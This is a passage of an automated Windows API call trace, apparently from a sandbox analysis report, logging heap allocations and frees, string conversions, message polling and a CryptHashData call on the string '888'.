returned 0x2e51b08 [0259.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.210] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.211] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0259.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51e80 [0259.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0259.212] CryptHashData (hHash=0xa87490, pbData=0x2e54fe8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0259.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0259.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.217] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.217] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0259.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0259.218] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.218] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0259.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0259.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0259.220] RtlAllocateHeap 